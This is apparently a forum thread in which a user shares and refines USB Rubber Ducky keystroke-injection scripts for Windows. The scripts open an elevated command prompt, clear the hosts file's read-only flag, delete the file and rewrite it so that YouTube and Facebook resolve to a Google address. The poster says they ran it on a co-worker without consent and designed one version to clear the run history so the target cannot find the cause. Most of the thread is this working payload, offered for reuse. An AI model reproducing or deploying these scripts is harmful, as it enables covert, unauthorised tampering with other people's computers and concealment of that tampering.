Jump to content

Recommended Posts

Ello everyone,

I am very new with the ducky, and I am looking for some help.

As I understand, powershell must be installed for any of the "Duck Toolkit" payloads to work. I was interested in DNS poisioning, but I cant get it to work correctly. I even tried to remove the command prompt section and have an administrative cmd already up and running before I plugged in my ducky. Everything went smoothly, but it still did nothing. I have disabled all my anti-virus programs and even tried a few random other DNS poisioning/host mod scripts that I randomly found on here and other websites. No luck.

Is there a way to:

1. copy "hosts.txt" (pre-created file) from my single ducky sd card to the \Windows\System32\drivers\etc folder

2. delete "hosts" file in \Windows\System32\drivers\etc folder

3. rename "hosts.txt" to just "hosts"

Please, no powershell. It seems pretty simple, but I still have no idea what I am doing. :wacko:

Link to post
Share on other sites

Since no one wanted to help, I did it all myself. Can anyone clean this up a bit? I am guessing that I made this too complicated. It is designed for Win XP and Win 7.

Change hosts file (read-only) to redirect Youtube + Facebook to Google.

DELAY 3000
DEFAULT_DELAY 250
GUI r
STRING %WINDIR%\SYSTEM32\DRIVERS\ETC\
ENTER
CONTROL A
SHIFT F10
STRING R
DELAY 500
SPACE
ENTER
ENTER
DELAY 1000
LEFT
ENTER
DELAY 1000
ALT F4
GUI d
CONTROL N
ALT f
STRING W
DELAY 500
STRING S
DELAY 500
STRING CMD.EXE
ENTER
STRING COMMANDPROMPT
ENTER
DELAY 500
STRING COMMANDPROMPT
SHIFT F10
STRING A
ENTER
DELAY 750
LEFT
ENTER
DELAY 750
STRING DEL %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
DELAY 500
STRING %windir%\system32\notepad.exe
ENTER
DELAY 500
DEFAULT_DELAY 0
STRING # cOPYRIGHT © 1993-2009 mICROSOFT cORP.
ENTER
STRING #
ENTER
STRING # tHIS IS A SAMPLE hosts FILE USED BY mICROSOFT tcp/ip FOR wINDOWS.
ENTER
STRING #
ENTER
STRING # tHIS FILE CONTAINS THE MAPPINGS OF ip ADDRESSES TO HOST NAMES. eACH
ENTER
STRING # ENTRY SHOULD BE KEPT ON AN INDIVIDUAL LINE. tHE ip ADDRESS SHOULD
ENTER
STRING # BE PLACED IN THE FIRST COLUMN FOLLOWED BY THE CORRESPONDING HOST NAME.
ENTER
STRING # tHE ip ADDRESS AND THE HOST NAME SHOULD BE SEPARATED BY AT LEAST ONE
ENTER
STRING # SPACE.
ENTER
STRING #
ENTER
STRING # aDDITIONALLY, COMMENTS (SUCH AS THESE) MAY BE INSERTED ON INDIVIDUAL
ENTER
STRING # LINES OR FOLLOWING THE MACHINE NAME DENOTED BY A '#' SYMBOL.
ENTER
STRING #
ENTER
STRING # fOR EXAMPLE:
ENTER
STRING #
ENTER
STRING # 102.54.94.97 RHINO.ACME.COM # SOURCE SERVER
ENTER
STRING # 38.25.63.10 X.ACME.COM # X CLIENT HOST
ENTER
ENTER
STRING # LOCALHOST NAME RESOLUTION IS HANDLED WITHIN dns ITSELF.
ENTER
STRING # 127.0.0.1 LOCALHOST
ENTER
STRING # ::1 LOCALHOST
ENTER
ENTER
STRING 74.125.228.97 YOUTUBE.COM
ENTER
STRING 74.125.228.97 WWW.YOUTUBE.COM
ENTER
STRING 74.125.228.97 FACEBOOK.COM
ENTER
STRING 74.125.228.97 WWW.FACEBOOK.COM
ENTER
DEFAULT_DELAY 250
CONTROL S
STRING %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
DELAY 1000
ALT F4
DELAY 500
STRING RENAME %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS.TXT HOSTS
ENTER
DELAY 500
STRING EXIT
ENTER
ALT F4
GUI d
CONTROL N
STRING COMMANDPROMPT
DELETE
ENTER
ALT F4

Change hosts file (write access) to redirect Youtube + Facebook to Google.

DELAY 3000
DEFAULT_DELAY 250

GUI d
CONTROL N
ALT f
STRING W
DELAY 500
STRING S
DELAY 500
STRING CMD.EXE
ENTER
STRING COMMANDPROMPT
ENTER
DELAY 500
STRING COMMANDPROMPT
SHIFT F10
STRING A
ENTER
DELAY 750
LEFT
ENTER
DELAY 750
STRING DEL %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
DELAY 500
STRING %windir%\system32\notepad.exe
ENTER
DELAY 500
DEFAULT_DELAY 0
STRING # cOPYRIGHT © 1993-2009 mICROSOFT cORP.
ENTER
STRING #
ENTER
STRING # tHIS IS A SAMPLE hosts FILE USED BY mICROSOFT tcp/ip FOR wINDOWS.
ENTER
STRING #
ENTER
STRING # tHIS FILE CONTAINS THE MAPPINGS OF ip ADDRESSES TO HOST NAMES. eACH
ENTER
STRING # ENTRY SHOULD BE KEPT ON AN INDIVIDUAL LINE. tHE ip ADDRESS SHOULD
ENTER
STRING # BE PLACED IN THE FIRST COLUMN FOLLOWED BY THE CORRESPONDING HOST NAME.
ENTER
STRING # tHE ip ADDRESS AND THE HOST NAME SHOULD BE SEPARATED BY AT LEAST ONE
ENTER
STRING # SPACE.
ENTER
STRING #
ENTER
STRING # aDDITIONALLY, COMMENTS (SUCH AS THESE) MAY BE INSERTED ON INDIVIDUAL
ENTER
STRING # LINES OR FOLLOWING THE MACHINE NAME DENOTED BY A '#' SYMBOL.
ENTER
STRING #
ENTER
STRING # fOR EXAMPLE:
ENTER
STRING #
ENTER
STRING # 102.54.94.97 RHINO.ACME.COM # SOURCE SERVER
ENTER
STRING # 38.25.63.10 X.ACME.COM # X CLIENT HOST
ENTER
ENTER
STRING # LOCALHOST NAME RESOLUTION IS HANDLED WITHIN dns ITSELF.
ENTER
STRING # 127.0.0.1 LOCALHOST
ENTER
STRING # ::1 LOCALHOST
ENTER
ENTER
STRING 74.125.228.97 YOUTUBE.COM
ENTER
STRING 74.125.228.97 WWW.YOUTUBE.COM
ENTER
STRING 74.125.228.97 FACEBOOK.COM
ENTER
STRING 74.125.228.97 WWW.FACEBOOK.COM
ENTER
DEFAULT_DELAY 250
CONTROL S
STRING %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
DELAY 1000
ALT F4
DELAY 500
STRING RENAME %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS.TXT HOSTS
ENTER
DELAY 500
STRING EXIT
ENTER
ALT F4
GUI d
CONTROL N
STRING COMMANDPROMPT
DELETE
ENTER
ALT F4

Link to post
Share on other sites

After messing around with it a little bit, I cleaned it up.Then I successfully tested it on a lazy co-worker who surfs the net all day. :D This is written to have caps-lock on while running (not necessary), and the first script will "clear" the run history to prevent the target from locating the problem.

Using this script the first time, the host files will be read-only. Use this:

DELAY 3000
DEFAULT_DELAY 250
GUI r
STRING %WINDIR%\SYSTEM32\DRIVERS\ETC\
ENTER
CONTROL A
SHIFT F10
STRING R
DELAY 500
SPACE
ENTER
ENTER
DELAY 1000
LEFT
ENTER
DELAY 1000
ALT F4
CONTROL ESCAPE
DELAY 500
STRING cmd
DELAY 500
MENU
DELAY 500
STRING A
ENTER
DELAY 750
LEFT
ENTER
DELAY 750
STRING DEL %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
DELAY 500
STRING %windir%\system32\notepad.exe
ENTER
DELAY 500
DEFAULT_DELAY 0
STRING # cOPYRIGHT © 1993-2009 mICROSOFT cORP.
ENTER
STRING #
ENTER
STRING # tHIS IS A SAMPLE hosts FILE USED BY mICROSOFT tcp/ip FOR wINDOWS.
ENTER
STRING #
ENTER
STRING # tHIS FILE CONTAINS THE MAPPINGS OF ip ADDRESSES TO HOST NAMES. eACH
ENTER
STRING # ENTRY SHOULD BE KEPT ON AN INDIVIDUAL LINE. tHE ip ADDRESS SHOULD
ENTER
STRING # BE PLACED IN THE FIRST COLUMN FOLLOWED BY THE CORRESPONDING HOST NAME.
ENTER
STRING # tHE ip ADDRESS AND THE HOST NAME SHOULD BE SEPARATED BY AT LEAST ONE
ENTER
STRING # SPACE.
ENTER
STRING #
ENTER
STRING # aDDITIONALLY, COMMENTS (SUCH AS THESE) MAY BE INSERTED ON INDIVIDUAL
ENTER
STRING # LINES OR FOLLOWING THE MACHINE NAME DENOTED BY A '#' SYMBOL.
ENTER
STRING #
ENTER
STRING # fOR EXAMPLE:
ENTER
STRING #
ENTER
STRING # 102.54.94.97 RHINO.ACME.COM # SOURCE SERVER
ENTER
STRING # 38.25.63.10 X.ACME.COM # X CLIENT HOST
ENTER
ENTER
STRING # LOCALHOST NAME RESOLUTION IS HANDLED WITHIN dns ITSELF.
ENTER
STRING # 127.0.0.1 LOCALHOST
ENTER
STRING # ::1 LOCALHOST
ENTER
ENTER
STRING 74.125.228.97 YOUTUBE.COM
ENTER
STRING 74.125.228.97 WWW.YOUTUBE.COM
ENTER
STRING 74.125.228.97 FACEBOOK.COM
ENTER
STRING 74.125.228.97 WWW.FACEBOOK.COM
ENTER
DEFAULT_DELAY 250
CONTROL S
STRING %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
DELAY 1000
ALT F4
DELAY 500
STRING RENAME %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS.TXT HOSTS
ENTER
DELAY 500
STRING EXIT
ENTER
DELAY 500
GUI r
STRING MSCONFIG
ENTER
DELAY 750
ALT F4

After using the previous script once, the host files will be read-write. Use this:

DELAY 3000
DEFAULT_DELAY 250
CONTROL ESCAPE
DELAY 500
STRING cmd
DELAY 500
MENU
DELAY 500
STRING A
ENTER
DELAY 750
LEFT
ENTER
DELAY 750
STRING DEL %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
DELAY 500
STRING %windir%\system32\notepad.exe
ENTER
DELAY 500
DEFAULT_DELAY 0
STRING # cOPYRIGHT © 1993-2009 mICROSOFT cORP.
ENTER
STRING #
ENTER
STRING # tHIS IS A SAMPLE hosts FILE USED BY mICROSOFT tcp/ip FOR wINDOWS.
ENTER
STRING #
ENTER
STRING # tHIS FILE CONTAINS THE MAPPINGS OF ip ADDRESSES TO HOST NAMES. eACH
ENTER
STRING # ENTRY SHOULD BE KEPT ON AN INDIVIDUAL LINE. tHE ip ADDRESS SHOULD
ENTER
STRING # BE PLACED IN THE FIRST COLUMN FOLLOWED BY THE CORRESPONDING HOST NAME.
ENTER
STRING # tHE ip ADDRESS AND THE HOST NAME SHOULD BE SEPARATED BY AT LEAST ONE
ENTER
STRING # SPACE.
ENTER
STRING #
ENTER
STRING # aDDITIONALLY, COMMENTS (SUCH AS THESE) MAY BE INSERTED ON INDIVIDUAL
ENTER
STRING # LINES OR FOLLOWING THE MACHINE NAME DENOTED BY A '#' SYMBOL.
ENTER
STRING #
ENTER
STRING # fOR EXAMPLE:
ENTER
STRING #
ENTER
STRING # 102.54.94.97 RHINO.ACME.COM # SOURCE SERVER
ENTER
STRING # 38.25.63.10 X.ACME.COM # X CLIENT HOST
ENTER
ENTER
STRING # LOCALHOST NAME RESOLUTION IS HANDLED WITHIN dns ITSELF.
ENTER
STRING # 127.0.0.1 LOCALHOST
ENTER
STRING # ::1 LOCALHOST
ENTER
ENTER
STRING 74.125.228.97 YOUTUBE.COM
ENTER
STRING 74.125.228.97 WWW.YOUTUBE.COM
ENTER
STRING 74.125.228.97 FACEBOOK.COM
ENTER
STRING 74.125.228.97 WWW.FACEBOOK.COM
ENTER
DEFAULT_DELAY 250
CONTROL S
STRING %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
DELAY 1000
ALT F4
DELAY 500
STRING RENAME %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS.TXT HOSTS
ENTER
DELAY 500
STRING EXIT
ENTER

Link to post
Share on other sites

On a side note, you may want to also add a third redirect to the list. The "mobile" site was still accessible, but this should clear it up. Depending on how many sites you want to redirect, the second script should take about 40 seconds. :ph34r:

STRING 74.125.228.97 FACEBOOK.COM
ENTER
STRING 74.125.228.97 WWW.FACEBOOK.COM
ENTER

STRING 74.125.228.97 MOBILE.FACEBOOK.COM
ENTER

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...